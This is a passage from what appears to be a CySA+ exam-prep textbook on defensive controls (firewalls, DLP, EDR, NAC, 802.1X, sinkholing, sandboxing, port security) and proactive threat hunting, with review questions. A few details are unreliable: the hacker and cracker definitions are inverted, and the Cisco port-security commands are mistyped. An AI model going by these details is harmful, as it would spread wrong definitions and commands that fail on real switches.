Table 12-3 lists the pros and cons of the various types of
firewalls.
Table 12-3 Pros and Cons of Firewall Types
Type
Packet
filteri
ng
firewa
lls
Advantages
Disadvantages
Best performance
Cannot prevent:
IP spoofing
Attacks that are
specific to an
application
Attacks that depend
on packet
fragmentation
Attacks that take
advantage of the TCP
handshake
Circui
t-level
proxie
s
Secure addresses from
exposure
Slight impact on
performance
Support a multiprotocol
environment
May require a
client on the
computer (SOCKS
proxy)
Allow for comprehensive
logging
No application
layer security
Applic
ationlevel
proxie
s
Understand the details of the
communication process at
Layer 7 for the application
Big impact on
performance
Kernel
proxy
firewa
lls
Inspect the packet at every
layer of the OSI model
Don’t impact
performance as do
application layer
proxies
Note
Other firewalls and associated network architecture approaches were covered in
Chapter 8.
INTRUSION PREVENTION SYSTEM (IPS)
RULES
As you learned earlier, some IPSs can be rule-based. Chapter 3,
“Vulnerability Management Activities,” and Chapter 11 covered
these IPSs in more detail. Chapter 11 covered rule writing in
more detail.
DATA LOSS PREVENTION (DLP)
Data loss prevention (DLP) software attempts to prevent
data leakage. It does this by maintaining awareness of actions
that can and cannot be taken with respect to a document. For
example, DLP software might allow printing of a document but
only at the company office. It might also disallow sending the
document through e-mail. DLP software uses ingress and egress
filters to identify sensitive data that is leaving the organization
and can prevent such leakage. Another scenario might be the
release of product plans that should be available only to the
Sales group. You could set the following policy for that
document:
It cannot be e-mailed to anyone other than Sales group members.
It cannot be printed.
It cannot be copied.
There are two locations where you can implement this policy:
Network DLP: Installed at network egress points near the
perimeter, network DLP analyzes network traffic.
Endpoint DLP: Endpoint DLP runs on end-user workstations or
servers in the organization.
You can use both precise and imprecise methods to determine
what is sensitive:
Precise methods: These methods involve content registration
and trigger almost zero false-positive incidents.
Imprecise methods: These methods can include keywords,
lexicons, regular expressions, extended regular expressions,
metadata tags, Bayesian analysis, and statistical analysis.
The value of a DLP system resides in the level of precision with
which it can locate and prevent the leakage of sensitive data.
ENDPOINT DETECTION AND RESPONSE
(EDR)
Endpoint detection and response (EDR) is a proactive
endpoint security approach designed to supplement existing
defenses. This advanced endpoint approach shifts security from
a reactive threat approach to one that can detect and prevent
threats before they reach the organization. It focuses on three
essential elements for effective threat prevention: automation,
adaptability, and continuous monitoring.
The following are some examples of EDR products:
FireEye Endpoint Security
Carbon Black CB Response
Guidance Software EnCase Endpoint Security
Cybereason Total Enterprise Protection
Symantec Endpoint Protection
RSA NetWitness Endpoint
The advantage of EDR systems is that they provide continuous
monitoring. The disadvantage is that the software’s use of
resources could impact performance of the device.
NETWORK ACCESS CONTROL (NAC)
Network access control (NAC) is a service that goes beyond
authentication of the user and includes examination of the state
of the computer the user is introducing to the network when
making a remote-access or VPN connection to the network.
The Cisco world calls these services Network Admission Control
(NAC), and the Microsoft world calls them Network Access
Protection (NAP). Regardless of the term used, the goals of the
features are the same: to examine all devices requesting
network access for malware, missing security updates, and any
other security issues the devices could potentially introduce to
the network.
Figure 12-3 shows the steps that occur in Microsoft NAP. The
health state of the device requesting access is collected and sent
to the Network Policy Server (NPS), where the state is
compared to requirements. If requirements are met, access is
granted.
FIGURE 12-3 NAC
The limitations of using NAC and NAP are as follows:
They work well for company-managed computers but less well for
guests.
They tend to react only to known threats and not to new threats.
The return on investment is still unproven.
Some implementations involve confusing configuration.
Access decisions can be of the following types:
Time based: A user might be allowed to connect to the network
only during specific times of day.
Rule based: A user might have his access controlled by a rule such
as “all devices must have the latest antivirus patches installed.”
Role based: A user may derive her network access privileges from
a role she has been assigned, typically through addition to a specific
security group.
Location based: A user might have one set of access rights when
connected from another office and another set when connected
from the Internet.
Quarantine/Remediation
If you examine step 5 in the process shown in Figure 12-3, you
see that a device that fails examination is placed in a restricted
network until it can be remediated. A remediation server
addresses the problems discovered on the device. It may remove
the malware, install missing operating system updates, or
update virus definitions. When the remediation process is
complete, the device is granted full access to the network.
Agent-Based vs. Agentless NAC
NAC can be deployed with or without agents on devices. An
agent is software used to control and interact with a device.
Agentless NAC is the easiest to deploy but offers less control
and fewer inspection capabilities. Agent-based NAC can
perform deep inspection and remediation at the expense of
additional software on the endpoint.
Both agent-based and agentless NAC can be used to mitigate the
following issues:
Malware
Missing OS patches
Missing anti-malware updates
802.1X
Another form of network access control is 802.1X Extensible
Authentication Protocol (EAP). 802.1X is a standard that
defines a framework for centralized port-based authentication.
It can be applied to both wireless and wired networks and uses
three components:
Supplicant: The user or device requesting access to the network
Authenticator: The device through which the supplicant is
attempting to access the network
Authentication server: The centralized device that performs
authentication
The role of the authenticator can be performed by a wide variety
of network access devices, including remote-access servers
(both dial-up and VPN), switches, and wireless access points.
The role of the authentication server can be performed by a
Remote Authentication Dial-in User Service (RADIUS) or
Terminal Access Controller Access Control System Plus
(TACACS+) server. The authenticator requests credentials from
the supplicant and, upon receipt of those credentials, relays
them to the authentication server, where they are validated.
Upon successful verification, the authenticator is notified to
open the port for the supplicant to allow network access. Figure
12-4 illustrates this process.
Figure 12-4 802.1X Architecture
While RADIUS and TACACS+ perform the same roles, they
have different characteristics. These differences must be taken
into consideration when choosing a method. Keep in mind also
that while RADIUS is a standard, TACACS+ is Cisco
proprietary. Table 12-4 compares them.
Table 12-4 RADIUS vs. TACACS+
RADIUS
TACACS+
Transp
ort
Protoc
ol
Uses UDP, which
may result in faster
response
Uses TCP, which offers
more information for
troubleshooting
Confid
entialit
Encrypts only the
password in the
Encrypts the entire body of
the packet but leaves a
y
access request
packet
standard TACACS+ header
for troubleshooting
Authen
ticatio
n and
Author
ization
Combines
authentication and
authorization
Separates authentication,
authorization, and
accounting processes
Suppor
ted
Layer 3
Protoc
ols
Does not support
any of the
following:
Supports all protocols
Apple Remote
Access protocol
NetBIOS Frame
Protocol Control
protocol
X.25 PAD
connections
Device
s
Does not support
securing the
available
commands on
routers and
switches
Supports securing the
available commands on
routers and switches
Traffic
Creates less traffic
Creates more traffic
Among the issues 802.1X port-based authentication can help
mitigate are the following:
Network DoS attacks
Device spoofing (because it authenticates the user, not the device)
SINKHOLING
A sinkhole is a router designed to accept and analyze attack
traffic. Sinkholes can be used to do the following:
Draw traffic away from a target
Monitor worm traffic
Monitor other malicious traffic
During an attack, a sinkhole router can be quickly configured to
announce a route to the target’s IP address that leads to a
network or an alternate device where the attack can be safely
studied. Moreover, sinkholes can also be used to prevent a
compromised host from communicating back to the attacker.
Finally, they can be used to prevent a worm-infected system
from infecting other systems. Sinkholes can be used to mitigate
the following issues:
Worms
Compromised devices communicating with command and control
(C&C) servers
External attacks targeted at a single device inside the network
MALWARE SIGNATURES
While placing malware in a sandbox or isolation area for study
is a safe way of reverse engineering and eventually disarming
the malware, the best defense is to identify and remove malware
when it enters the network before it infects the devices.
To do this, network security devices such as SIEM, IPS, IDS,
and firewall systems must be able to recognize the malware
when it is still contained in network packets before it reaches
devices. This requires identifying a malware signature. This
could be a filename or it could be some series of characters that
can be tied uniquely to the malware.
You learned about signature-based IPS/IDS systems earlier.
You may remember that these systems and rule-based systems
both rely on rules that instruct the security device to be on the
lookout for certain character strings in a packet.
Development/Rule Writing
One of the keys to successful signature matching and therefore
successful malware prevention is proper rule writing, which is
in the development realm. Just as automation is driving
network technicians to learn basic development theory and rule
writing, so is malware signature identification. Rule creation
does not always rely on the name of the malicious file. It also
can be based on behavior that is dangerous in and of itself.
Examples of rules or behavior that can indicate that a system is
infected by malware are as follows:
A system process that drops various malware executables (e.g.,
Dropper, a kind of Trojan that has been designed to “install” some
sort of malware)
A system process that reaches out to random, and often foreign, IP
addresses/domains
Repeated attempts to monitor or modify key system settings such as
registry keys
SANDBOXING
Chapter 11 briefly introduced sandboxing. You can use a
sandbox to run a possibly malicious program in a safe
environment so that it doesn’t infect the local system.
By using sandboxing tools, you can execute malware executable
files without allowing the files to interact with the local system.
Some sandboxing tools also allow you to analyze the
characteristics of an executable. This is not possible with some
malware because it is specifically written to do different things
if it detects that it’s being executed in a sandbox.
In many cases, sandboxing tools operate by sending a file to a
special server that analyzes the file and sends you a report on it.
Sometimes this is a free service, but in many instances it is not.
Some examples of these services include the following:
Sandboxie
Akana
Binary Guard True Bare Metal
BitBlaze Malware Analysis Service
Comodo Automated Analysis System and Valkyrie
Deepviz Malware Analyzer
Detux Sandbox (Linux binaries)
Another option for studying malware is to set up a “sheep dip”
computer. This is a system that has been isolated from the other
systems and is used for analyzing suspect files and messages for
malware. You can take measures such as the following on a
sheep dip system:
Install port monitors to discover ports used by the malware.
Install file monitors to discover what changes may be made to files.
Install network monitors to identify what communications the
malware may attempt.
Install one or more antivirus programs to perform malware
analysis.
Often these sheep dip systems are combined with antivirus
sensor systems to which malicious traffic is reflected for
analysis. The safest way to perform reverse engineering and
malware analysis is to prepare a test bed. Doing so involves the
following steps:
Step 1. Install virtualization software on the host.
Step 2. Create a VM and install a guest operating system on
the VM.
Step 3. Isolate the system from the network by ensuring that
the NIC is set to “host” only mode.
Step 4. Disable shared folders and enable guest isolation on
the VM.
Step 5. Copy the malware to the guest operating system.
Also, you need isolated network services for the VM, such as
DNS. It may also be beneficial to install multiple operating
systems in both patched and unpatched configurations. Finally,
you can make use of virtualization snapshots and reimaging
tools to wipe and rebuild machines quickly. Once the test bed is
set up, you also need to install a number of other tools to use on
the isolated VM, including the following:
Imaging tools: You need these tools to take images for forensics
and prosecution procedures. Examples include SafeBack Version
2.0 and Linux dd.
File/data analysis tools: You need these tools to perform static
analysis of potential malware files. Examples include PeStudio and
PEframe.
Registry/configuration tools: You need these tools to help
identify infected settings in the registry and to identify the lastsaved settings. Examples include Microsoft’s Sysinternals Autoruns
and Silent Runners.vbs.
Sandbox tools: You need these tools for manual malware analysis
in a safe environment.
Log analyzers: You need these tools to extract log files. Examples
include AWStats and Apache Log Viewer.
Network capture tools: You need these tools to understand how
the malware uses the network. Examples include Wireshark and
Omnipeek.
While the use of virtual machines to investigate the effects of
malware is quite common, you should know that some wellwritten malware can break out of a VM relatively easily, making
this approach problematic.
PORT SECURITY
Port security applies to ports on a switch or wireless home
router, and because it relies on monitoring the MAC addresses
of the devices attached to the switch ports, it is considered to be
Layer 2 security. While disabling any ports that are not in use is
always a good idea, port security goes a step further and allows
you to keep a port enabled for legitimate devices while
preventing its use by illegitimate devices. You can apply two
types of restrictions to a switch port:
Restrict the specific MAC addresses allowed to send on the port.
Restrict the total number of different MAC addresses allowed to
send on the port.
By specifying which specific MAC addresses are allowed to send
on a port, you can prevent unknown devices from connecting to
the switch port. Port security is applied at the interface level.
The interface must be configured as an access port, so first you
ensure that it is by executing the following command:
Click here to view code image
Switch(config)# int fa0/1
Switch(config-if)# switchport mode access
In order for port security to function, you must enable the
feature. To enable it on a switchport, use the following
command at the interface configuration prompt:
Click here to view code image
Switch(config-if)# switchport port security
Limiting MAC Addresses
Now you need to define the maximum number of MAC
addresses allowed on the port. In many cases today, IP phones
and computers share a switchport (the computer plugs into the
phone, and the phone plugs into the switch), so here you want
to allow a maximum of two:
Click here to view code image
Switch(config-if)# switchport port security maximum 2
Next, you define the two allowed MAC addresses, in this case,
aaaa.aaaa.aaaa and bbbb.bbbb.bbbb:
Click here to view code image
Switch(config-if)# switchport port security mac-address
aaaa.aaaa.
aaaa
Switch(config-if)# switchport port security mac-address
bbbb.bbbb.
bbbb
Finally, you set an action for the switch to take if there is a
violation. By default, the action is to shut down the port. You
can also set it to restrict, which doesn’t shut down the port but
prevents the violating device from sending any data. In this
case, set it to restrict:
Click here to view code image
Switch(config-if)# switchport port security violation
restrict
Now you have secured the port to allow only the two MAC
addresses required by the legitimate user: one for his phone and
the other for his computer. Now you just need to gather all the
MAC addresses for all the phones and computers, and you can
lock down all the ports. Boy, that’s a lot of work! In the next
section, you’ll see that there is an easier way.
Implementing Sticky MAC
Sticky MAC is a feature that allows a switch to learn the MAC
addresses of the devices currently connected to the port and
convert them to secure MAC addresses (the only MAC addresses
allowed to send on the port). All you need to do is specify the
keyword sticky in the command where you designate the MAC
addresses, and you’re done. You still define the maximum
number, and Sticky MAC converts up to that number of
addresses to secure MAC addresses. Therefore, you can secure
all ports by only specifying the number allowed on each port
and specifying the sticky command in the port security macaddress command. To secure a single port, execute the
following code:
Click here to view code image
Switch(config-if)# port security
Switch(config-if)# port security maximum 2
Switch(config-if)# port security mac-address sticky
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 12-5
lists a reference of these key topics and the page numbers on
which each is found.
Table 12-5 Key Topics in Chapter 12
Key Topic
Element
Description
Page
Number
Figure 12-1
Software restrictions
382
Figure 12-2
Placement of an NGFW
384
Table 12-2
Advantages and disadvantages of
NGFWs
384
Table 12-3
Pros and cons of firewall types
385
Figure 12-3
NAC
388
Bulleted list
Access decision types
388
Figure 12-4
802.1X architecture
390
Table 12-4
RADIUS vs. TACACS+
390
Section
Sinkholing
391
Step list
Preparing a test bed
393
Bulleted list
Tools for sandboxing and reverse
engineering
393
Section
Port security
394
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
permissions
rights
whitelisting
blacklisting
firewalls
next-generation firewalls (NGFWs)
host-based firewall
data loss prevention (DLP)
endpoint detection and response (EDR)
network access control (NAC)
802.1X
supplicant
authenticator
authentication server
sinkhole
port security
sticky MAC
REVIEW QUESTIONS
1. Granting someone the ability to reset passwords is the
assignment of a(n) ________.
2. List at least one disadvantage of packet filtering firewalls.
3. Match the following terms with their definitions.
Term
s
Definitions
Scr
ee
ne
d
su
bn
et
Resides on a single host and is designed to protect that
host only
NG
F
W
Linux host-based firewall
Ho
stbas
ed
fire
wa
ll
A category of devices that attempt to address traffic
inspection and application awareness shortcomings of a
traditional stateful firewall, without hampering the
performance
Ipt
abl
es
Architecture where two firewalls are used, and traffic must
be inspected at both firewalls before it can enter the
internal network
4. List at least two advantages of circuit-level proxies.
5. ___________________ is installed at network egress
points near the perimeter, to prevent data exfiltration.
6. Match the following terms with their definitions.
Terms
Definitions
802.1X
Microsoft’s name for NAC services
Network
Access
Protectio
n (NAP)
NAC that can perform deep inspection and
remediation at the expense of additional software on
the endpoint
Agentbased
Type of rule where a user might have one set of
access rights when connected from another office
and another set when connected from the Internet
Location
-based
Defines a framework for centralized port-based
authentication
7. List at least two disadvantages of RADIUS.
8. _______________ is a system that has been isolated
from the other systems and is used for analyzing suspect
files and messages for malware.
9. Match the following terms with their definitions.
Terms
Definitions
Imaging tools
Used to perform static analysis of potential
malware files
Registry/conf
iguration
tools
Used to take images for forensics and
prosecution procedures
File/data
analysis tools
Used to understand how the malware uses the
network
Packet
capture tools
Used to help identify infected settings in the
registry and to identify the last-saved settings
10. List at least two measures that should be taken with sheep
dip systems.
Chapter 13
The Importance of
Proactive Threat Hunting
This chapter covers the following topics related to Objective 3.3
(Explain the importance of proactive threat hunting) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Establishing a hypothesis: Discusses the importance of this first
step in threat hunting.
Profiling threat actors and activities: Covers the process and
kits application.
Threat hunting tactics: Describes hunting techniques, including
executable process analysis.
Reducing the attack surface area: Identifies what constitutes
the attack surface.
Bundling critical assets: Discusses the reasoning behind this
technique.
Attack vectors: Defines various attack vectors.
Integrated intelligence: Describes a technology that addresses
the need for shared intelligence.
Improving detection capabilities: Identifies methods for
improving detection.
Threat hunting is a security approach that places emphasis on
actively searching for threats rather than sitting back and
waiting to react. It is sometimes referred to as offensive in
nature rather than defensive. This chapter explores threat
hunting and details what it involves.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these eight self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 13-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 13-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Establishing a Hypothesis
1
Profiling Threat Actors and Activities
2
Threat Hunting Tactics
3
Reducing the Attack Surface Area
4
Bundling Critical Assets
5
Attack Vectors
6
Integrated Intelligence
7
Improving Detection Capabilities
8
1. Which of the following is the first step in the scientific
method?
1. Ask a question.
2. Conduct an experiment.
3. Make a conclusion.
4. Establish a hypothesis.
2. The U.S. Federal Bureau of Investigation (FBI) has
identified all but which of the following categories of threat
actors?
1. Hacktivists
2. Organized crime
3. State sponsors
4. Terrorist groups
3. Which of the following might identify a device that has been
compromised with malware?
1. Executable process analysis
2. Regression analysis
3. Risk management
4. Polyinstantiation
4. Which of the following allows you prevent any changes to
the device configuration, even by users who formerly had the
right to configure the device?
1. Configuration lockdown
2. System hardening
3. NAC
4. DNSSec
5. Which of the following is a measure of how freely data can
be handled?
1. Transparency
2. Sensitivity
3. Value
4. Quality
6. Which metric included in the CVSS Attack Vector metric
group means that the attacker can cause the vulnerability
from any network?
1. B
2. N
3. L
4. A
7. Which of the following focuses on merging cybersecurity
and physical security to aid governments in dealing with
emerging threats?
1. OWASP
2. NIST
3. IIC
4. PDA
8. In which step of Deming’s Plan–Do–Check–Act cycle are
the results of the implementation analyzed to determine
whether it made a difference?
1. Plan
2. Do
3. Check
4. Act
FOUNDATION TOPICS
ESTABLISHING A HYPOTHESIS
The first phase of proactive threat hunting is to establish a
hypothesis about the aims and nature of a potential attack,
similar to establishing a hypothesis when following the
scientific method, shown in Figure 13-1. When security
incidents are occurring, and even when they are not occurring at
the current time, security professionals must anticipate attacks
and establish a hypothesis regarding the attack aims and
method as soon as possible. As you may already know from the
scientific method, making an educated guess about the aims
and nature of an attack is the first step. Then you conduct
experiments (or gather more network data) to either prove or
disprove the hypothesis. Then the process starts again with a
new hypothesis if the old one has been disproved.
Figure 13-1 Scientific Method
For example, if an attacker is probing your network for
unknown reasons, you might follow the method in this way:
1. Why is he doing this, what is his aim?
2. He is trying to perform a port scan.
3. Monitor and capture the traffic he sends to the network.
4. Look for the presence of packets that have been crafted by the
hacker compared to those that are the result of the normal TCP
three-way handshake.
5. These packet types are not present; therefore, his intent is not to
port scan.
At this point another hypothesis will be suggested and the
process begins again.
PROFILING THREAT ACTORS AND
ACTIVITIES
A threat is carried out by a threat actor. For example, an
attacker who takes advantage of an inappropriate or absent ACL
is a threat actor. Keep in mind, though, that threat actors can
discover and/or exploit vulnerabilities. Not all threat actors will
actually exploit an identified vulnerability. While you learned
about basic threat actors in Chapter 1, “The Importance of
Threat Data and Intelligence,” the U.S. Federal Bureau of
Investigation (FBI) has identified three categories of threat
actors:
Organized crime groups primarily threatening the financial services
sector and expanding the scope of their attacks
State sponsors or advanced persistent threats (APTs), usually
foreign governments, interested in pilfering data, including
intellectual property and research and development data from
major manufacturers, government agencies, and defense
contractors
Terrorist groups that want to impact countries by using the Internet
and other networks to disrupt or harm the viability of a society by
damaging its critical infrastructure
While there are other, less organized groups out there, law
enforcement considers these three groups to be the primary
threat actors. However, organizations should not totally
disregard the threats of any threat actors that fall outside these
three categories. Lone actors or smaller groups that use hacking
as a means to discover and exploit any discovered vulnerability
can cause damage just like the larger, more organized groups.
Hacker and cracker are two terms that are often used
interchangeably in media but do not actually have the same
meaning. Hackers are individuals who attempt to break into
secure systems to obtain knowledge about the systems and
possibly use that knowledge to carry out pranks or commit
crimes. Crackers, on the other hand, are individuals who
attempt to break into secure systems without using the
knowledge gained for any nefarious purposes. Hacktivists are
the latest new group to crop up. They are activists for a cause,
such as animal rights, that use hacking as a means to get their
message out and affect the businesses that they feel are
detrimental to their cause.
In the security world, the terms white hat, gray hat, and black
hat are more easily understood and less often confused than the
terms hackers and crackers. A white hat does not have any
malicious intent. A black hat has malicious intent. A gray hat is
somewhere between the other two. A gray hat may, for example,
break into a system, notify the administrator of the security
hole, and offer to fix the security issues for a fee. Threat actors
use a variety of techniques to gather the information required to
gain a foothold.
THREAT HUNTING TACTICS
Security analysts use various techniques in the process of
anticipating and identifying threats. Some of these methods
revolve around network surveillance and others involve
examining the behaviors of individual systems.
Hunt Teaming
Hunt teaming is a new approach to security that is offensive in
nature rather than defensive, which has been the common
approach of security teams in the past. Hunt teams work
together to detect, identify, and understand advanced and
determined threat actors. Hunt teaming is covered in Chapter 8,
“Security Solutions for Infrastructure Management.”
Threat Model
A threat model is a conceptual design that attempts to
provide a framework on which to implement security efforts.
Many models have been created. Let’s say, for example, that you
have an online banking application and need to assess the
points at which the application faces threats. Figure 13-2 shows
how a threat model in the form of a data flow diagram might be
created using the Open Web Application Security Project
(OWASP) approach to identify where the trust boundaries are
located.
Threat modeling tools go beyond these simple data flow
diagrams. The following are some recent tools:
Threat Modeling Tool (formerly SDL Threat Modeling Tool)
identifies threats based on the STRIDE threat classification scheme.
ThreatModeler identifies threats based on a customizable
comprehensive threat library and is intended for collaborative use
across all organizational stakeholders.
IriusRisk offers both community and commercial versions of a
tool that focuses on the creation and maintenance of a live threat
model through the entire software development life cycle (SDLC). It
connects with several different tools to empower automation.
securiCAD focuses on threat modeling of IT infrastructures using
a computer-based design (CAD) approach where assets are
automatically or manually placed on a drawing pane.
SD Elements is a software security requirements management
platform that includes automated threat modeling capabilities.
Figure 13-2 OWASP Threat Model
Executable Process Analysis
When the processor is very busy with very little or nothing
running to generate the activity, it could be a sign that the
processor is working on behalf of malicious software. This is one
of the key reasons any compromise is typically accompanied by
a drop in performance. Executable process analysis allows
you to determine this. While Task Manager in Windows is
designed to help with this, it has some limitations. For one,
when you are attempting to use it, you are typically already in a
resource crunch, and it takes a bit to open. Then when it does
open, the CPU has settled back down, and you have no way of
knowing what caused it.
By using Task Manager, you can determine what process is
causing a bottleneck at the CPU. For example, Figure 13-3
shows that in Task Manager, you can click the Processes tab and
then click the CPU column to sort the processes with the top
CPU users at the top. In Figure 13-3, the top user is Task
Manager, which makes sense since it was just opened.
Figure 13-3 Task Manager
A better tool to use is Sysinternals, which is a free download at
https://docs.microsoft.com/sysinternals/. The specific part of
this tool you need is Process Explorer, which enables you to
see in the Notification area the top CPU offender, without
requiring you to open Task Manager. Moreover, Process
Explorer enables you to look at the graph that appears in Task
Manager and identify what caused spikes in the past, which is
not possible with Task Manager alone. In Figure 13-4, you can
see that Process Explorer breaks down each process into its
subprocesses.
An example of using Task Manager for threat hunting is to
proactively look at times and dates when processor usage is high
during times when system usage is typically low, indicating a
malicious process at work.
FIGURE 13-4 Process Explorer
Memory Consumption
Another key indicator of a compromised host is increased
memory consumption. Many times it is an indication that
additional programs have been loaded into RAM so they can be
processed. Then once they are loaded, they use RAM in the
process of executing their tasks, whatever they may be. You can
monitor memory consumption by using the same approach you
use for CPU consumption. If memory usage cannot be
accounted for, you should investigate it. (Review what you
learned about buffer overflows, which are attacks that may
display symptoms of increased memory consumption.)
REDUCING THE ATTACK SURFACE AREA
Reducing the attack surface area means limiting the features
and functions that are available to an attacker. For example, if I
lock all doors to the facility with the exception of one, I have
reduced the attack surface. Another term for reducing the attack
surface area is system hardening because it involves
ensuring that all systems have been hardened to the extent that
is possible and still provide functionality.
System Hardening
Another of the ongoing goals of operations security is to ensure
that all systems have been hardened to the extent that is
possible and still provide functionality. System hardening can
be accomplished both on physical and on logical bases. From a
logical perspective:
Remove unnecessary applications.
Disable unnecessary services.
Block unrequired ports.
Tightly control the connecting of external storage devices and
media, if allowed at all.
System hardening is also done at the physical layer. Physical
security was covered in Chapter 7 but some examples include
Fences around the facility
Locks on the doors
Disabled USB ports
Display filters
Clean desk policy
Configuration Lockdown
Configuration lockdown (sometimes also called system
lockdown) is a setting that can be implemented on devices
including servers, routers, switches, firewalls, and virtual hosts.
You set it on a device after that device is correctly configured,
and it prevents any changes to the configuration, even by users
who formerly had the right to configure the device. This setting
helps support change control.
Full tests for functionality of all services and applications should
be performed prior to implementing this setting. Many products
that provide this functionality offer a test mode, in which you
can log any problems the current configuration causes without
allowing the problems to completely manifest on the network.
This allows you to identify and correct any problems prior to
implementing full lockdown.
BUNDLING CRITICAL ASSETS
While organizations should strive to protect all assets, in the
cybersecurity world we tend to focus on what is at risk in the
cyber world, which is our data. Bundling these critical digital
assets helps to organize them so that security controls can be
applied more cleanly with fewer possible human errors. Before
bundling can be done, data must be classified. Data
classification is covered in Chapter 6. Let’s talk about
classification levels.
Commercial Business Classifications
Commercial businesses usually classify data using four main
classification levels, listed here from highest sensitivity level to
lowest:
1. Confidential
2. Private
3. Sensitive
4. Public
Data that is confidential includes trade secrets, intellectual data,
application programming code, and other data that could
seriously affect the organization if unauthorized disclosure
occurred. Data at this level would only be available to personnel
in the organization whose work relates to the data’s subject.
Access to confidential data usually requires authorization for
each access. In the United States, confidential data is exempt
from disclosure under the Freedom of Information Act. In most
cases, the only way for external entities to have authorized
access to confidential data is as follows:
After signing a confidentiality agreement
When complying with a court order
As part of a government project or contract procurement agreement
Data that is private includes any information related to
personnel, including human resources records, medical records,
and salary information, that is used only within the
organization. Data that is sensitive includes organizational
financial information and requires extra measures to ensure its
CIA and accuracy. Public data is data whose disclosure would
not cause a negative impact on the organization.
Military and Government Classifications
Military and government entities usually classify data using five
main classification levels, listed here from highest sensitivity
level to lowest:
1. Top secret: Data that is top secret includes weapon blueprints,
technology specifications, spy satellite information, and other
military information that could gravely damage national security if
disclosed.
2. Secret: Data that is secret includes deployment plans, missile
placement, and other information that could seriously damage
national security if disclosed.
3. Confidential: Data that is confidential includes patents, trade
secrets, and other information that could seriously affect the
government if unauthorized disclosure occurred.
4. Sensitive but unclassified: Data that is sensitive but
unclassified includes medical or other personal data that might not
cause serious damage to national security but could cause citizens
to question the reputation of the government.
5. Unclassified: Military and government information that does not
fall into any of the other four categories is considered unclassified
and usually has to be granted to the public based on the Freedom of
Information Act.
Distribution of Critical Assets
One strategy that can help support resiliency is to ensure that
critical assets are not all located in the same physical location.
Collocating critical assets leaves your organization open to the
kind of nightmare that occurred in 2017 at the Atlanta airport.
When a fire took out the main and backup power systems
(which were located together), the busiest airport in the world
went dark for over 12 hours. Distribution of critical assets
certainly enhances resilience.
ATTACK VECTORS
An attack vector is a segment of the communication path that
an attack uses to access a vulnerability. Each attack vector can
be thought of as comprising a source of malicious content, a
potentially vulnerable processor of that malicious content, and
the nature of the malicious content itself.
Recall from Chapter 2, “Utilizing Threat Intelligence to Support
Organizational Security,” that the Common Vulnerability
Scoring System (CVSS) has as part of its Base metric group a
metric called Attack Vector (AV). AV describes how the attacker
would exploit the vulnerability and has four possible values:
L: Stands for Local and means that the attacker must have physical
or logical access to the affected system.
A: Stands for Adjacent network and means that the attacker must
be on the local network.
N: Stands for Network and means that the attacker can cause the
vulnerability from any network.
P: Stands for Physical and requires the attacker to physically touch
or manipulate the vulnerable component.
Analysts can use the accumulated CVSS information regarding
attacks to match current characteristics of indicators of
compromise to common attacks.
INTEGRATED INTELLIGENCE
Integrated intelligence refers to the consideration and
analysis of intelligence data from a perspective that combines
multiple data sources and attempts to make inferences based on
this data integration. Many vendors of security software and
appliances often tout the intelligence integration capabilities of
their products. SIEM systems are a good example, as described
in Chapter 11, “Analyzing Data as Part of Security Monitoring
Activities.”
The Integrated Intelligence Center (IIC) is a unit at the Center
for Internet Security (CIS) that focuses on merging
cybersecurity and physical security to aid governments in
dealing with emerging threats. IIC attempts to create predictive
models using the multiple data sources at its disposal.
IMPROVING DETECTION CAPABILITIES
Detection of events and incidents as they occur is critical.
Organizations should be constantly trying to improve their
detection capabilities.
Continuous Improvement
Security professionals can never just sit back, relax, and enjoy
the ride. Security needs are always changing because the “bad
guys” never take a day off. It is therefore vital that security
professionals continuously work to improve their organization’s
security. Tied into this is the need to improve the quality of the
security controls currently implemented. Quality improvement
commonly uses a four-step quality model, known as Deming’s
Plan–D–Check–Act cycle, the steps for which are as follows:
1. Plan: Identify an area for improvement and make a formal plan to
implement it.
2. Do: Implement the plan on a small scale.
3. Check: Analyze the results of the implementation to determine
whether it made a difference.
4. Act: If the implementation made a positive change, implement it
on a wider scale. Continuously analyze the results.
This can’t be done without establishing some metrics to
determine how successful you are now.
Continuous Monitoring
Any logging and monitoring activities should be part of an
organizational continuous monitoring program. The continuous
monitoring program must be designed to meet the needs of the
organization and implemented correctly to ensure that the
organization’s critical infrastructure is guarded. Organizations
may want to look into Continuous Monitoring as a Service
(CMaaS) solutions deployed by cloud service providers.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 13-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 13-2 Key Topics in Chapter 13
Key Topic
Element
Description
Page
Number
Figure 13-1
Scientific method
404
Figure 13-2
OWASP threat model
406
Bulleted list
Threat modeling tools
407
Bulleted list
System hardening
410
Numbered list
Commercial business
classifications
411
Numbered list
Military and government
classifications
412
Numbered list
Deming’s Plan–Do–Check–Act
413
cycle
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
threat actors
hacker
cracker
hunt teaming
threat model
executable process analysis
Process Explorer
system hardening
configuration lockdown
sensitivity
criticality
attack vector
integrated intelligence
REVIEW QUESTIONS
1. Place the following steps of the scientific method in order.
Step
Analyze the results
Conduct an experiment
Make a conclusion
Ask a question
State a hypothesis
2. List and describe at least one threat modeling tool.
3. ____________________ allows you to determine when
a CPU is struggling with malware.
4. Match the following terms with their definitions.
Terms
Definitions
System
hardenin
g
Prevents any changes to the configuration, even by
users who formerly had the right to configure the
device
Configura
tion
lockdown
Critical to all systems to protect the confidentiality,
